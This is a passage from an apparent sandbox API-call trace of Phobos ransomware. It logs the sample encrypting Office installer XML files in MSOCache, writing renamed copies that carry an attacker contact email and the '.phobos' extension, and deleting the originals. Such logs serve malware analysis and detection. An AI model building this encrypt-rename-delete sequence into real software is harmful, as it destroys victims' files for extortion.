dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0137.319] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6241) returned 1 [0137.319] CloseHandle (hObject=0x140) returned 1 [0137.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0137.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0137.319] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0137.319] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0137.319] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0137.319] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0137.725] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa2e570) returned 1 [0137.725] CryptSetKeyParam (hKey=0xa2e570, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0137.725] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1861, lpOverlapped=0x0) returned 1 [0140.219] CryptEncrypt (in: hKey=0xa2e570, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1870, dwBufLen=0x1870 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1870) returned 1 [0140.219] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1870, lpOverlapped=0x0) returned 1 [0140.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0140.222] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0140.223] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0140.223] CryptDestroyKey (hKey=0xa32968) returned 1 [0140.223] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0140.223] CryptDestroyKey (hKey=0xa2e570) returned 1 [0140.223] CloseHandle (hObject=0x140) returned 1 [0140.223] CloseHandle (hObject=0x130) returned 1 [0140.224] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0140.225] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0140.225] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0140.225] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=819) returned 1 [0140.225] CloseHandle (hObject=0x130) returned 1 [0140.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 0x2020 [0140.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0140.225] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0140.225] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0140.226] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0140.226] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0140.226] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0140.226] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0140.226] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x333, lpOverlapped=0x0) returned 1 [0140.397] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x340, dwBufLen=0x340 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x340) returned 1 [0140.397] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x340, lpOverlapped=0x0) returned 1 [0140.397] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0140.397] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0140.397] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0140.397] CryptDestroyKey (hKey=0xa32d68) returned 1 [0140.397] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0140.398] CryptDestroyKey (hKey=0xa32968) returned 1 [0140.398] CloseHandle (hObject=0x130) returned 1 [0140.398] CloseHandle (hObject=0x140) returned 1 [0140.398] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml")) returned 1 [0140.399] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0140.399] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0140.400] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4274) returned 1 [0140.401] CloseHandle (hObject=0x140) returned 1 [0140.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0140.401] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0140.401] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0140.401] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0140.401] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0140.401] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0140.401] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0140.401] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0140.401] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10b2, lpOverlapped=0x0) returned 1 [0141.189] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10c0, dwBufLen=0x10c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10c0) returned 1 [0141.189] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10c0, lpOverlapped=0x0) returned 1 [0141.190] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0141.190] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0141.190] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0141.190] CryptDestroyKey (hKey=0xa32da8) returned 1 [0141.190] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0141.190] CryptDestroyKey (hKey=0xa32968) returned 1 [0141.190] CloseHandle (hObject=0x140) returned 1 [0141.190] CloseHandle (hObject=0x130) returned 1 [0141.191] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0141.192] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0141.192] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0142.049] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16852) returned 1 [0142.049] CloseHandle (hObject=0x130) returned 1 [0142.049] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 0x2020 [0142.050] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0142.050] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0142.050] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0142.050] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0142.050] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0142.050] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0142.050] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0142.050] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x41d4, lpOverlapped=0x0) returned 1 [0142.131] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x41e0, dwBufLen=0x41e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x41e0) returned 1 [0142.132] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x41e0, lpOverlapped=0x0) returned 1 [0142.133] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0142.133] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0142.133] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0142.133] CryptDestroyKey (hKey=0xa32da8) returned 1 [0142.133] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0142.133] CryptDestroyKey (hKey=0xa32968) returned 1 [0142.133] CloseHandle (hObject=0x130) returned 1 [0142.133] CloseHandle (hObject=0x140) returned 1 [0142.134] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1 [0142.135] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0142.135] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0142.135] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=31094) returned 1 [0142.135] CloseHandle (hObject=0x140) returned 1 [0142.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0142.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0142.135] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0142.136] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0142.136] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0142.136] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0142.136] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0142.136] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0142.136] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7976, lpOverlapped=0x0) returned 1 [0142.405] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7980, dwBufLen=0x7980 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7980) returned 1 [0142.405] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7980, lpOverlapped=0x0) returned 1 [0142.406] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0142.406] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0142.406] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0142.406] CryptDestroyKey (hKey=0xa32da8) returned 1 [0142.406] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0142.406] CryptDestroyKey (hKey=0xa32968) returned 1 [0142.406] CloseHandle (hObject=0x140) returned 1 [0142.406] CloseHandle (hObject=0x130) returned 1 [0142.407] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0142.409] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0142.409] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0142.410] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4274) returned 1 [0142.410] CloseHandle (hObject=0x130) returned 1 [0142.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0142.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0142.410] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0142.410] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0142.410] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0142.410] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" 